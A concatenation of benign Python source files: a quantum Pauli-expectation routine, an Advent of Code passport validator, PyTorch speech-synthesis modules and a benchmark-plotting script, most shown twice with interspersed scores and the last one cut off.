same measured results expecval = 0 for coeff, pauli_str in clique: first = True for operator in pauli_str: if not first: eigenvalues = np.kron(np.array([1.0, 1.0 if operator == 'i' else -1.0]), eigenvalues) else: eigenvalues = np.array([1.0, 1.0 if operator == 'i' else -1.0]) first = False expecval_index = np.dot(eigenvalues, prob) expecval += coeff * expecval_index return expecval def get_expectation(self, preceding_circuits: List[BasicCircuit], shots: int, backend: str) -> float: """Computes the expectation value of the Pauli terms :param preceding_circuit: Circuit precedes the measurement circuit :param shots: Number of measurement shots :param backend: Backend to be used in this task :return: Expectation value of the Pauli terms """ # Generate Pauli cliques for the hamiltonian graph cliques = grouping_hamiltonian(self._pauli_terms) # Calculate each expectation = 0 for pauli_clique in cliques: env = QEnv() env.backend(backend) q = env.Q.createList(self._num) # Add circuit for circuit in preceding_circuits: circuit.add_circuit(q) self.add_circuit(q, pauli_clique) # Submit job counts = env.commit(shots, fetchMeasure=True)['counts'] # Expectation result = self._single_clique_expectation(pauli_clique, counts, shots) expectation += result return expectation
0.930054
0.617743
import re filename = "input.txt" valid_props = { 'byr', 'iyr', 'eyr', 'hgt', 'hcl', 'ecl', 'pid' } f = open(filename, 'r') passports=[] passport='' for line in f.readlines(): line = line.strip() passport = passport + line + ' ' if line == "": passports.append(passport.strip()) passport = '' passports.append(passport.strip()) valid = 0 for passport in passports: valid_prop_count = 0 parts = passport.split(' ') for part in parts: kv = part.split(':') key = kv[0] value = kv[1] print(key, value) if key in valid_props: if key == 'byr': if len(value) != 4: continue if int(value) < 1920: continue if int(value) > 2002: continue if key == 'iyr': if len(value) != 4: continue if int(value) < 2010: continue if int(value) > 2020: continue if key == 'eyr': if len(value) != 4: continue if int(value) < 2020: continue if int(value) > 2030: continue if key == 'hgt': x = re.match('^([0-9]+)(cm|in)$', value) if x is None: continue num = x.groups()[0] unit = x.groups()[1] if unit == 'cm': if int(num) < 150 or int(num) > 193: continue if unit == 'in': if int(num) < 59 or int(num) > 76: continue if key == 'hcl': x = re.match('^#[0-9a-f]{6}$', value) if x is None: continue if key == 'ecl': colors = {'amb', 'blu', 'brn', 'gry', 'grn', 'hzl', 'oth'} if value not in colors: continue if key == 'pid': x = re.match('^[0-9]{9}$', value) if x is None: continue valid_prop_count += 1 if valid_prop_count >= 7: valid += 1 print('valid = ', valid)
day_4/passport_processing_part_2.py
import re filename = "input.txt" valid_props = { 'byr', 'iyr', 'eyr', 'hgt', 'hcl', 'ecl', 'pid' } f = open(filename, 'r') passports=[] passport='' for line in f.readlines(): line = line.strip() passport = passport + line + ' ' if line == "": passports.append(passport.strip()) passport = '' passports.append(passport.strip()) valid = 0 for passport in passports: valid_prop_count = 0 parts = passport.split(' ') for part in parts: kv = part.split(':') key = kv[0] value = kv[1] print(key, value) if key in valid_props: if key == 'byr': if len(value) != 4: continue if int(value) < 1920: continue if int(value) > 2002: continue if key == 'iyr': if len(value) != 4: continue if int(value) < 2010: continue if int(value) > 2020: continue if key == 'eyr': if len(value) != 4: continue if int(value) < 2020: continue if int(value) > 2030: continue if key == 'hgt': x = re.match('^([0-9]+)(cm|in)$', value) if x is None: continue num = x.groups()[0] unit = x.groups()[1] if unit == 'cm': if int(num) < 150 or int(num) > 193: continue if unit == 'in': if int(num) < 59 or int(num) > 76: continue if key == 'hcl': x = re.match('^#[0-9a-f]{6}$', value) if x is None: continue if key == 'ecl': colors = {'amb', 'blu', 'brn', 'gry', 'grn', 'hzl', 'oth'} if value not in colors: continue if key == 'pid': x = re.match('^[0-9]{9}$', value) if x is None: continue valid_prop_count += 1 if valid_prop_count >= 7: valid += 1 print('valid = ', valid)
0.117965
0.124426
import torch import torch.nn as nn import torch.nn.functional as F from collections import OrderedDict from numba import jit import numpy as np import copy import math import hparams as hp import utils device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') def get_sinusoid_encoding_table(n_position, d_hid, padding_idx=None): ''' Sinusoid position encoding table ''' def cal_angle(position, hid_idx): return position / np.power(10000, 2 * (hid_idx // 2) / d_hid) def get_posi_angle_vec(position): return [cal_angle(position, hid_j) for hid_j in range(d_hid)] sinusoid_table = np.array([get_posi_angle_vec(pos_i) for pos_i in range(n_position)]) sinusoid_table[:, 0::2] = np.sin(sinusoid_table[:, 0::2]) # dim 2i sinusoid_table[:, 1::2] = np.cos(sinusoid_table[:, 1::2]) # dim 2i+1 if padding_idx is not None: # zero vector for padding dimension sinusoid_table[padding_idx] = 0. return torch.FloatTensor(sinusoid_table) def clones(module, N): return nn.ModuleList([copy.deepcopy(module) for _ in range(N)]) # @jit(nopython=True) def create_alignment(base_mat, duration_predictor_output): N, L = duration_predictor_output.shape for i in range(N): count = 0 for j in range(L): for k in range(duration_predictor_output[i][j]): base_mat[i][count+k][j] = 1 count = count + duration_predictor_output[i][j] return base_mat class LengthRegulator(nn.Module): """ Length Regulator """ def __init__(self): super(LengthRegulator, self).__init__() self.duration_predictor = DurationPredictor() def LR(self, x, duration_predictor_output, mel_max_length=None): expand_max_len = torch.max( torch.sum(duration_predictor_output, -1), -1)[0] alignment = torch.zeros(duration_predictor_output.size(0), expand_max_len, duration_predictor_output.size(1)).numpy() alignment = create_alignment(alignment, duration_predictor_output.cpu().numpy()) alignment = torch.from_numpy(alignment).to(device) output = alignment @ x if mel_max_length: output = F.pad( output, (0, 0, 0, mel_max_length-output.size(1), 0, 0)) return output def forward(self, x, alpha=1.0, target=None, mel_max_length=None): duration_predictor_output = self.duration_predictor(x) if target is not None: output = self.LR(x, target, mel_max_length=mel_max_length) return output, duration_predictor_output else: duration_predictor_output = ( (duration_predictor_output + 0.5) * alpha).int() output = self.LR(x, duration_predictor_output) mel_pos = torch.stack( [torch.Tensor([i+1 for i in range(output.size(1))])]).long().to(device) return output, mel_pos class DurationPredictor(nn.Module): """ Duration Predictor """ def __init__(self): super(DurationPredictor, self).__init__() self.input_size = hp.encoder_dim self.filter_size = hp.duration_predictor_filter_size self.kernel = hp.duration_predictor_kernel_size self.conv_output_size = hp.duration_predictor_filter_size self.dropout = hp.dropout self.conv_layer = nn.Sequential(OrderedDict([ ("conv1d_1", Conv(self.input_size, self.filter_size, kernel_size=self.kernel, padding=1)), ("layer_norm_1", nn.LayerNorm(self.filter_size)), ("relu_1", nn.ReLU()), ("dropout_1", nn.Dropout(self.dropout)), ("conv1d_2", Conv(self.filter_size, self.filter_size, kernel_size=self.kernel, padding=1)), ("layer_norm_2", nn.LayerNorm(self.filter_size)), ("relu_2", nn.ReLU()), ("dropout_2", nn.Dropout(self.dropout)) ])) self.linear_layer = Linear(self.conv_output_size, 1) self.relu = nn.ReLU() def forward(self, encoder_output): out = self.conv_layer(encoder_output) out = self.linear_layer(out) out = self.relu(out) out = out.squeeze() if not self.training: out = out.unsqueeze(0) return out class BatchNormConv1d(nn.Module): def __init__(self, in_dim, out_dim, kernel_size, stride, padding, activation=None, w_init_gain='linear'): super(BatchNormConv1d, self).__init__() self.conv1d = nn.Conv1d(in_dim, out_dim, kernel_size=kernel_size, stride=stride, padding=padding, bias=False) self.bn = nn.BatchNorm1d(out_dim) self.activation = activation torch.nn.init.xavier_uniform_( self.conv1d.weight, gain=torch.nn.init.calculate_gain(w_init_gain)) def forward(self, x): x = self.conv1d(x) if self.activation is not None: x = self.activation(x) return self.bn(x) class Conv(nn.Module): """ Convolution Module """ def __init__(self, in_channels, out_channels, kernel_size=1, stride=1, padding=0, dilation=1, bias=True, w_init='linear'): """ :param in_channels: dimension of input :param out_channels: dimension of output :param kernel_size: size of kernel :param stride: size of stride :param padding: size of padding :param dilation: dilation rate :param bias: boolean. if True, bias is included. :param w_init: str. weight inits with xavier initialization. """ super(Conv, self).__init__() self.conv = nn.Conv1d(in_channels, out_channels, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, bias=bias) nn.init.xavier_uniform_( self.conv.weight, gain=nn.init.calculate_gain(w_init)) def forward(self, x): x = x.contiguous().transpose(1, 2) x = self.conv(x) x = x.contiguous().transpose(1, 2) return x class Linear(nn.Module): """ Linear Module """ def __init__(self, in_dim, out_dim, bias=True, w_init='linear'): """ :param in_dim: dimension of input :param out_dim: dimension of output :param bias: boolean. if True, bias is included. :param w_init: str. weight inits with xavier initialization. """ super(Linear, self).__init__() self.linear_layer = nn.Linear(in_dim, out_dim, bias=bias) nn.init.xavier_uniform_( self.linear_layer.weight, gain=nn.init.calculate_gain(w_init)) def forward(self, x): return self.linear_layer(x) class Highway(nn.Module): def __init__(self, in_size, out_size): super(Highway, self).__init__() self.H = nn.Linear(in_size, out_size) self.H.bias.data.zero_() self.T = nn.Linear(in_size, out_size) self.T.bias.data.fill_(-1) self.relu = nn.ReLU() self.sigmoid = nn.Sigmoid() def forward(self, inputs): H = self.relu(self.H(inputs)) T = self.sigmoid(self.T(inputs)) return H * T + inputs * (1.0 - T) class Prenet(nn.Module): """ Prenet before passing through the network """ def __init__(self, input_size, hidden_size, output_size): super(Prenet, self).__init__() self.input_size = input_size self.output_size = output_size self.hidden_size = hidden_size self.layer = nn.Sequential(OrderedDict([ ('fc1', Linear(self.input_size, self.hidden_size)), ('relu1', nn.ReLU()), ('dropout1', nn.Dropout(0.5)), ('fc2', Linear(self.hidden_size, self.output_size)), ('relu2', nn.ReLU()), ('dropout2', nn.Dropout(0.5)), ])) def forward(self, x): out = self.layer(x) return out class CBHG(nn.Module): """CBHG module: a recurrent neural network composed of: - 1-d convolution banks - Highway networks + residual connections - Bidirectional gated recurrent units """ def __init__(self, in_dim, K=16, projections=[128, 128]): super(CBHG, self).__init__() self.in_dim = in_dim self.relu = nn.ReLU() self.conv1d_banks = nn.ModuleList( [BatchNormConv1d(in_dim, in_dim, kernel_size=k, stride=1, padding=k // 2, activation=self.relu) for k in range(1, K + 1)]) self.max_pool1d = nn.MaxPool1d(kernel_size=2, stride=1, padding=1) in_sizes = [K * in_dim] + projections[:-1] activations = [self.relu] * (len(projections) - 1) + [None] self.conv1d_projections = nn.ModuleList( [BatchNormConv1d(in_size, out_size, kernel_size=3, stride=1, padding=1, activation=ac) for (in_size, out_size, ac) in zip( in_sizes, projections, activations)]) self.pre_highway = nn.Linear(projections[-1], in_dim, bias=False) self.highways = nn.ModuleList( [Highway(in_dim, in_dim) for _ in range(4)]) self.gru = nn.GRU( in_dim, in_dim, 1, batch_first=True, bidirectional=True) def forward(self, inputs, input_lengths=None): # (B, T_in, in_dim) x = inputs # Needed to perform conv1d on time-axis # (B, in_dim, T_in) if x.size(-1) == self.in_dim: x = x.transpose(1, 2) T = x.size(-1) # (B, in_dim*K, T_in) # Concat conv1d bank outputs x = torch.cat([conv1d(x)[:, :, :T] for conv1d in self.conv1d_banks], dim=1) assert x.size(1) == self.in_dim * len(self.conv1d_banks) x = self.max_pool1d(x)[:, :, :T] for conv1d in self.conv1d_projections: x = conv1d(x) # (B, T_in, in_dim) # Back to the original shape x = x.transpose(1, 2) if x.size(-1) != self.in_dim: x = self.pre_highway(x) # Residual connection x += inputs for highway in self.highways: x = highway(x) if input_lengths is not None: x = nn.utils.rnn.pack_padded_sequence( x, input_lengths, batch_first=True) # (B, T_in, in_dim*2) self.gru.flatten_parameters() outputs, _ = self.gru(x) if input_lengths is not None: outputs, _ = nn.utils.rnn.pad_packed_sequence( outputs, batch_first=True) return outputs if __name__ == "__main__": # TEST a = torch.Tensor([[2, 3, 4], [1, 2, 3]]) b = torch.Tensor([[5, 6, 7], [7, 8, 9]]) c = torch.stack([a, b]) d = torch.Tensor([[1, 4], [6, 3]]).int() expand_max_len = torch.max(torch.sum(d, -1), -1)[0] base = torch.zeros(c.size(0), expand_max_len, c.size(1)) alignment = create_alignment(base.numpy(), d.numpy()) print(alignment) print(torch.from_numpy(alignment) @ c)
modules.py
import torch import torch.nn as nn import torch.nn.functional as F from collections import OrderedDict from numba import jit import numpy as np import copy import math import hparams as hp import utils device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') def get_sinusoid_encoding_table(n_position, d_hid, padding_idx=None): ''' Sinusoid position encoding table ''' def cal_angle(position, hid_idx): return position / np.power(10000, 2 * (hid_idx // 2) / d_hid) def get_posi_angle_vec(position): return [cal_angle(position, hid_j) for hid_j in range(d_hid)] sinusoid_table = np.array([get_posi_angle_vec(pos_i) for pos_i in range(n_position)]) sinusoid_table[:, 0::2] = np.sin(sinusoid_table[:, 0::2]) # dim 2i sinusoid_table[:, 1::2] = np.cos(sinusoid_table[:, 1::2]) # dim 2i+1 if padding_idx is not None: # zero vector for padding dimension sinusoid_table[padding_idx] = 0. return torch.FloatTensor(sinusoid_table) def clones(module, N): return nn.ModuleList([copy.deepcopy(module) for _ in range(N)]) # @jit(nopython=True) def create_alignment(base_mat, duration_predictor_output): N, L = duration_predictor_output.shape for i in range(N): count = 0 for j in range(L): for k in range(duration_predictor_output[i][j]): base_mat[i][count+k][j] = 1 count = count + duration_predictor_output[i][j] return base_mat class LengthRegulator(nn.Module): """ Length Regulator """ def __init__(self): super(LengthRegulator, self).__init__() self.duration_predictor = DurationPredictor() def LR(self, x, duration_predictor_output, mel_max_length=None): expand_max_len = torch.max( torch.sum(duration_predictor_output, -1), -1)[0] alignment = torch.zeros(duration_predictor_output.size(0), expand_max_len, duration_predictor_output.size(1)).numpy() alignment = create_alignment(alignment, duration_predictor_output.cpu().numpy()) alignment = torch.from_numpy(alignment).to(device) output = alignment @ x if mel_max_length: output = F.pad( output, (0, 0, 0, mel_max_length-output.size(1), 0, 0)) return output def forward(self, x, alpha=1.0, target=None, mel_max_length=None): duration_predictor_output = self.duration_predictor(x) if target is not None: output = self.LR(x, target, mel_max_length=mel_max_length) return output, duration_predictor_output else: duration_predictor_output = ( (duration_predictor_output + 0.5) * alpha).int() output = self.LR(x, duration_predictor_output) mel_pos = torch.stack( [torch.Tensor([i+1 for i in range(output.size(1))])]).long().to(device) return output, mel_pos class DurationPredictor(nn.Module): """ Duration Predictor """ def __init__(self): super(DurationPredictor, self).__init__() self.input_size = hp.encoder_dim self.filter_size = hp.duration_predictor_filter_size self.kernel = hp.duration_predictor_kernel_size self.conv_output_size = hp.duration_predictor_filter_size self.dropout = hp.dropout self.conv_layer = nn.Sequential(OrderedDict([ ("conv1d_1", Conv(self.input_size, self.filter_size, kernel_size=self.kernel, padding=1)), ("layer_norm_1", nn.LayerNorm(self.filter_size)), ("relu_1", nn.ReLU()), ("dropout_1", nn.Dropout(self.dropout)), ("conv1d_2", Conv(self.filter_size, self.filter_size, kernel_size=self.kernel, padding=1)), ("layer_norm_2", nn.LayerNorm(self.filter_size)), ("relu_2", nn.ReLU()), ("dropout_2", nn.Dropout(self.dropout)) ])) self.linear_layer = Linear(self.conv_output_size, 1) self.relu = nn.ReLU() def forward(self, encoder_output): out = self.conv_layer(encoder_output) out = self.linear_layer(out) out = self.relu(out) out = out.squeeze() if not self.training: out = out.unsqueeze(0) return out class BatchNormConv1d(nn.Module): def __init__(self, in_dim, out_dim, kernel_size, stride, padding, activation=None, w_init_gain='linear'): super(BatchNormConv1d, self).__init__() self.conv1d = nn.Conv1d(in_dim, out_dim, kernel_size=kernel_size, stride=stride, padding=padding, bias=False) self.bn = nn.BatchNorm1d(out_dim) self.activation = activation torch.nn.init.xavier_uniform_( self.conv1d.weight, gain=torch.nn.init.calculate_gain(w_init_gain)) def forward(self, x): x = self.conv1d(x) if self.activation is not None: x = self.activation(x) return self.bn(x) class Conv(nn.Module): """ Convolution Module """ def __init__(self, in_channels, out_channels, kernel_size=1, stride=1, padding=0, dilation=1, bias=True, w_init='linear'): """ :param in_channels: dimension of input :param out_channels: dimension of output :param kernel_size: size of kernel :param stride: size of stride :param padding: size of padding :param dilation: dilation rate :param bias: boolean. if True, bias is included. :param w_init: str. weight inits with xavier initialization. """ super(Conv, self).__init__() self.conv = nn.Conv1d(in_channels, out_channels, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, bias=bias) nn.init.xavier_uniform_( self.conv.weight, gain=nn.init.calculate_gain(w_init)) def forward(self, x): x = x.contiguous().transpose(1, 2) x = self.conv(x) x = x.contiguous().transpose(1, 2) return x class Linear(nn.Module): """ Linear Module """ def __init__(self, in_dim, out_dim, bias=True, w_init='linear'): """ :param in_dim: dimension of input :param out_dim: dimension of output :param bias: boolean. if True, bias is included. :param w_init: str. weight inits with xavier initialization. """ super(Linear, self).__init__() self.linear_layer = nn.Linear(in_dim, out_dim, bias=bias) nn.init.xavier_uniform_( self.linear_layer.weight, gain=nn.init.calculate_gain(w_init)) def forward(self, x): return self.linear_layer(x) class Highway(nn.Module): def __init__(self, in_size, out_size): super(Highway, self).__init__() self.H = nn.Linear(in_size, out_size) self.H.bias.data.zero_() self.T = nn.Linear(in_size, out_size) self.T.bias.data.fill_(-1) self.relu = nn.ReLU() self.sigmoid = nn.Sigmoid() def forward(self, inputs): H = self.relu(self.H(inputs)) T = self.sigmoid(self.T(inputs)) return H * T + inputs * (1.0 - T) class Prenet(nn.Module): """ Prenet before passing through the network """ def __init__(self, input_size, hidden_size, output_size): super(Prenet, self).__init__() self.input_size = input_size self.output_size = output_size self.hidden_size = hidden_size self.layer = nn.Sequential(OrderedDict([ ('fc1', Linear(self.input_size, self.hidden_size)), ('relu1', nn.ReLU()), ('dropout1', nn.Dropout(0.5)), ('fc2', Linear(self.hidden_size, self.output_size)), ('relu2', nn.ReLU()), ('dropout2', nn.Dropout(0.5)), ])) def forward(self, x): out = self.layer(x) return out class CBHG(nn.Module): """CBHG module: a recurrent neural network composed of: - 1-d convolution banks - Highway networks + residual connections - Bidirectional gated recurrent units """ def __init__(self, in_dim, K=16, projections=[128, 128]): super(CBHG, self).__init__() self.in_dim = in_dim self.relu = nn.ReLU() self.conv1d_banks = nn.ModuleList( [BatchNormConv1d(in_dim, in_dim, kernel_size=k, stride=1, padding=k // 2, activation=self.relu) for k in range(1, K + 1)]) self.max_pool1d = nn.MaxPool1d(kernel_size=2, stride=1, padding=1) in_sizes = [K * in_dim] + projections[:-1] activations = [self.relu] * (len(projections) - 1) + [None] self.conv1d_projections = nn.ModuleList( [BatchNormConv1d(in_size, out_size, kernel_size=3, stride=1, padding=1, activation=ac) for (in_size, out_size, ac) in zip( in_sizes, projections, activations)]) self.pre_highway = nn.Linear(projections[-1], in_dim, bias=False) self.highways = nn.ModuleList( [Highway(in_dim, in_dim) for _ in range(4)]) self.gru = nn.GRU( in_dim, in_dim, 1, batch_first=True, bidirectional=True) def forward(self, inputs, input_lengths=None): # (B, T_in, in_dim) x = inputs # Needed to perform conv1d on time-axis # (B, in_dim, T_in) if x.size(-1) == self.in_dim: x = x.transpose(1, 2) T = x.size(-1) # (B, in_dim*K, T_in) # Concat conv1d bank outputs x = torch.cat([conv1d(x)[:, :, :T] for conv1d in self.conv1d_banks], dim=1) assert x.size(1) == self.in_dim * len(self.conv1d_banks) x = self.max_pool1d(x)[:, :, :T] for conv1d in self.conv1d_projections: x = conv1d(x) # (B, T_in, in_dim) # Back to the original shape x = x.transpose(1, 2) if x.size(-1) != self.in_dim: x = self.pre_highway(x) # Residual connection x += inputs for highway in self.highways: x = highway(x) if input_lengths is not None: x = nn.utils.rnn.pack_padded_sequence( x, input_lengths, batch_first=True) # (B, T_in, in_dim*2) self.gru.flatten_parameters() outputs, _ = self.gru(x) if input_lengths is not None: outputs, _ = nn.utils.rnn.pad_packed_sequence( outputs, batch_first=True) return outputs if __name__ == "__main__": # TEST a = torch.Tensor([[2, 3, 4], [1, 2, 3]]) b = torch.Tensor([[5, 6, 7], [7, 8, 9]]) c = torch.stack([a, b]) d = torch.Tensor([[1, 4], [6, 3]]).int() expand_max_len = torch.max(torch.sum(d, -1), -1)[0] base = torch.zeros(c.size(0), expand_max_len, c.size(1)) alignment = create_alignment(base.numpy(), d.numpy()) print(alignment) print(torch.from_numpy(alignment) @ c)
0.914575
0.378057
import os import argparse import instrument_benchmark as bench from statistics import mean, stdev import numpy as np import matplotlib.pyplot as plt lout = None def lprint(message): print("{}".format(message)) if lout is not None: lout.write("{}\n".format(message)) def plot(x, y, yerr, label, fname): font = {'family': 'serif', 'color': 'darkblue', 'weight': 'bold', 'size': 16, } dpi = 100 fig = plt.figure(figsize=(1600 / dpi, 800 / dpi), dpi=dpi) ax = fig.add_subplot(111) plt.title(label) plt.ticklabel_format(style='sci', axis='y', scilimits=(0, 0)) axes = plt.gca() _max = 1.25 * max([abs(y[i]) + abs(yerr[i]) for i in range(len(y))]) axes.set_ylim([-_max, _max]) axes.ticklabel_format(style='sci', axis='y', scilimits=(0, 0)) plt.errorbar(x, y, yerr=yerr, fmt='bD--', label=label) plt.xticks(rotation=-45, rotation_mode='anchor', **font) # zip joins x and y coordinates in pairs for _x, _y in zip(x, y): _label = "{:8.3e}".format(_y) plt.annotate(_label, (_x, _y), textcoords="offset points", xytext=(0, 10), ha='center', **font) box = ax.get_position() ax.set_position([box.x0, box.y0 + 0.15 * box.height, box.width, 0.85 * box.height]) plt.savefig(fname, dpi=75) # plt.show() def print_info(results, label, chunk_size=5, baseline=None): ntimes = len(results.timing()) nchunk = ntimes / chunk_size modulo = ntimes % chunk_size nitr = int(nchunk + 1 if modulo > 0 else nchunk) _time = "" _over = "" _inst = "" _ftime = results.timing() _finst = results.inst_count() _fover = results.overhead(baseline) for i in range(nitr): beg = i * chunk_size end = (i + 1) * chunk_size if end > ntimes: end = ntimes _rtime = _ftime[beg:end] _rover = _fover[beg:end] _rinst = _finst[beg:end] _t = ", ".join(["{:10.3e}".format(i) for i in _rtime]) _o = ", ".join(["{:10.3e}".format(i) for i in _rover]) _i = ", ".join(["{:10}".format(i) for i in _rinst]) if i == 0: _time = "{}".format(_t) _over = "{}".format(_o) _inst = "{}".format(_i) else: _time = "{}\n\t{:23}{}".format(_time, "", _t) _over = "{}\n\t{:23}{}".format(_over, "", _o) _inst = "{}\n\t{:23}{}".format(_inst, "", _i) _time = _time.strip("\n") _over = _over.strip("\n") _inst = _inst.strip("\n") lprint("\n{}:\n".format(label)) lprint("\t{:20} : {:10}".format("entries", results.entries())) lprint("") lprint("\t{:20} : {}".format("instrument (count)", _inst)) lprint("") lprint("\t{:20} : {}".format("runtime (sec)", _time)) lprint("") lprint("\t{:20} : {}".format("overhead (sec)", _over)) lprint("") lprint("\t{:20} : {:10.3e}".format("runtime (mean)", mean(_ftime))) lprint("\t{:20} : {:10.3e}".format("runtime (stdev)", stdev(_ftime))) lprint("\t{:20} : {:10.3e}".format("overhead (mean)", mean(_fover))) lprint("\t{:20} : {:10.3e}".format("overhead (stdev)", stdev(_fover))) return {"runtime": [mean(_ftime), stdev(_ftime)], "overhead": [mean(_fover), stdev(_fover)]} if __name__ == "__main__": submodules = sorted(bench.submodules) if len(submodules) == 0: raise RuntimeError("No submodules!") default_baseline = "baseline" if "baseline" in submodules else submodules[0] parser = argparse.ArgumentParser() parser.add_argument("-p", "--prefix", type=str, default="DISABLED") parser.add_argument("-m", "--modes", type=str, nargs='*', default=["fibonacci", "matrix"], choices=["fibonacci", "matrix"]) parser.add_argument("-l", "--languages", type=str, choices=["c", "cxx"], default=["c", "cxx"], nargs='*') parser.add_argument("-b", "--baseline", type=str, choices=submodules, default=default_baseline, required=False, help="Compute overhead w.r.t. to this submodule measurement") parser.add_argument("-i", "--iterations", type=int, default=50, help="Number of iterations per timing entry") # specific to MATMUL parser.add_argument("-n", "--size", type=int, default=100, help="Matrix size (N x N)") parser.add_argument("-e", "--entries", type=int, default=50, help="Number of timing entries") # specific to FIBONACCI parser.add_argument("-f", "--fibonacci", type=int, default=43, help="Fibonacci value") parser.add_argument("-c", "--cutoff", type=int, default=23, help="Fibonacci cutoff") args = parser.parse_args() # log file lout = open("{}.txt".format(args.prefix.strip('_')), 'w') m_N = args.size # matrix size is N x N m_I = args.iterations # number of iterations per timing entry m_E = args.entries # number of timing entries m_F = args.fibonacci # fibonacci value m_C = args.cutoff # cutoff value mtx_keys = [] fib_keys = [] mtx_time_data = {"y": [], "yerr": []} fib_time_data = {"y": [], "yerr": []} mtx_over_data = {"y": [], "yerr": []} fib_over_data = {"y": [], "yerr": []} # calculate the baseline first submodules.remove(args.baseline) submodules = [args.baseline] + submodules if "matrix" in args.modes: for lang in args.languages: baseline = None for submodule in submodules: key = "[{}]> {}_{}".format( lang.upper(), "MATMUL", submodule.upper()) lprint("Executing {}...".format(key)) ret = getattr(bench, submodule).matmul(m_N, m_E, m_I, lang) if ret is not None: if baseline is None: baseline = ret data = print_info(ret, key, baseline=baseline) lprint("") # spacing module = submodule.upper() mtx_keys += ["{}_MATMUL_{}".format(lang.upper(), module)] mtx_time_data["y"] += [data["runtime"][0]] mtx_over_data["y"] += [data["overhead"][0]] mtx_time_data["yerr"] += [data["runtime"][1]] mtx_over_data["yerr"] += [data["overhead"][1]] if len(mtx_keys) > 0: plot(mtx_keys, mtx_time_data["y"], mtx_time_data["yerr"], "Matrix Multiply ({} x {}) Runtime".format( m_N, m_N), "{}_MATMUL_RUNTIME.png".format(args.prefix.upper())) plot(mtx_keys, mtx_over_data["y"], mtx_over_data["yerr"], "Matrix Multiply ({} x {}) Overhead".format( m_N, m_N), "{}_MATMUL_OVERHEAD.png".format(args.prefix.upper())) if "fibonacci" in args.modes: for lang in args.languages: baseline = None for submodule in submodules: key = "[{}]> {}_{}".format( lang.upper(), "FIBONACCI", submodule.upper()) lprint("Executing {}...".format(key)) ret = getattr(bench, submodule).fibonacci(m_F, m_C, m_I, lang) if ret is not None: if baseline is None: baseline = ret data = print_info(ret, key, baseline=baseline) lprint("") # spacing module = submodule.upper() fib_keys += ["{}_FIB_{}".format(lang.upper(), module)] fib_time_data["y"] += [data["runtime"][0]] fib_over_data["y"] += [data["overhead"][0]] fib_time_data["yerr"] += [data["runtime"][1]] fib_over_data["yerr"] += [data["overhead"][1]] if len(fib_keys) > 0: plot(fib_keys, fib_time_data["y"], fib_time_data["yerr"], "Fibonacci({}, {}) Runtime".format( m_F, m_C), "{}_FIBONACCI_RUNTIME.png".format(args.prefix.upper().strip("_"))) plot(fib_keys, fib_over_data["y"], fib_over_data["yerr"], "Fibonacci({}, {}) Overhead".format( m_F, m_C), "{}_FIBONACCI_OVERHEAD.png".format(args.prefix.upper().strip("_"))) lout.close()
examples/execute.py
import os import argparse import instrument_benchmark as bench from statistics import mean, stdev import numpy as np import matplotlib.pyplot as plt lout = None def lprint(message): print("{}".format(message)) if lout is not None: lout.write("{}\n".format(message)) def plot(x, y, yerr, label, fname): font = {'family': 'serif', 'color': 'darkblue', 'weight': 'bold', 'size': 16, } dpi = 100 fig = plt.figure(figsize=(1600 / dpi, 800 / dpi), dpi=dpi) ax = fig.add_subplot(111) plt.title(label) plt.ticklabel_format(style='sci', axis='y', scilimits=(0, 0)) axes = plt.gca() _max = 1.25 * max([abs(y[i]) + abs(yerr[i]) for i in range(len(y))]) axes.set_ylim([-_max, _max]) axes.ticklabel_format(style='sci', axis='y', scilimits=(0, 0)) plt.errorbar(x, y, yerr=yerr, fmt='bD--', label=label) plt.xticks(rotation=-45, rotation_mode='anchor', **font) # zip joins x and y coordinates in pairs for _x, _y in zip(x, y): _label = "{:8.3e}".format(_y) plt.annotate(_label, (_x, _y), textcoords="offset points", xytext=(0, 10), ha='center', **font) box = ax.get_position() ax.set_position([box.x0, box.y0 + 0.15 * box.height, box.width, 0.85 * box.height]) plt.savefig(fname, dpi=75) # plt.show() def print_info(results, label, chunk_size=5, baseline=None): ntimes = len(results.timing()) nchunk = ntimes / chunk_size modulo = ntimes % chunk_size nitr = int(nchunk + 1 if modulo > 0 else nchunk) _time = "" _over = "" _inst = "" _ftime = results.timing() _finst = results.inst_count() _fover = results.overhead(baseline) for i in range(nitr): beg = i * chunk_size end = (i + 1) * chunk_size if end > ntimes: end = ntimes _rtime = _ftime[beg:end] _rover = _fover[beg:end] _rinst = _finst[beg:end] _t = ", ".join(["{:10.3e}".format(i) for i in _rtime]) _o = ", ".join(["{:10.3e}".format(i) for i in _rover]) _i = ", ".join(["{:10}".format(i) for i in _rinst]) if i == 0: _time = "{}".format(_t) _over = "{}".format(_o) _inst = "{}".format(_i) else: _time = "{}\n\t{:23}{}".format(_time, "", _t) _over = "{}\n\t{:23}{}".format(_over, "", _o) _inst = "{}\n\t{:23}{}".format(_inst, "", _i) _time = _time.strip("\n") _over = _over.strip("\n") _inst = _inst.strip("\n") lprint("\n{}:\n".format(label)) lprint("\t{:20} : {:10}".format("entries", results.entries())) lprint("") lprint("\t{:20} : {}".format("instrument (count)", _inst)) lprint("") lprint("\t{:20} : {}".format("runtime (sec)", _time)) lprint("") lprint("\t{:20} : {}".format("overhead (sec)", _over)) lprint("") lprint("\t{:20} : {:10.3e}".format("runtime (mean)", mean(_ftime))) lprint("\t{:20} : {:10.3e}".format("runtime (stdev)", stdev(_ftime))) lprint("\t{:20} : {:10.3e}".format("overhead (mean)", mean(_fover))) lprint("\t{:20} : {:10.3e}".format("overhead (stdev)", stdev(_fover))) return {"runtime": [mean(_ftime), stdev(_ftime)], "overhead": [mean(_fover), stdev(_fover)]} if __name__ == "__main__": submodules = sorted(bench.submodules) if len(submodules) == 0: raise RuntimeError("No submodules!") default_baseline = "baseline" if "baseline" in submodules else submodules[0] parser = argparse.ArgumentParser() parser.add_argument("-p", "--prefix", type=str, default="DISABLED") parser.add_argument("-m", "--modes", type=str, nargs='*', default=["fibonacci", "matrix"], choices=["fibonacci", "matrix"]) parser.add_argument("-l", "--languages", type=str, choices=["c", "cxx"], default=["c", "cxx"], nargs='*') parser.add_argument("-b", "--baseline", type=str, choices=submodules, default=default_baseline, required=False, help="Compute overhead w.r.t. to this submodule measurement") parser.add_argument("-i", "--iterations", type=int, default=50, help="Number of iterations per timing entry") # specific to MATMUL parser.add_argument("-n", "--size", type=int, default=100, help="Matrix size (N x N)") parser.add_argument("-e", "--entries", type=int, default=50, 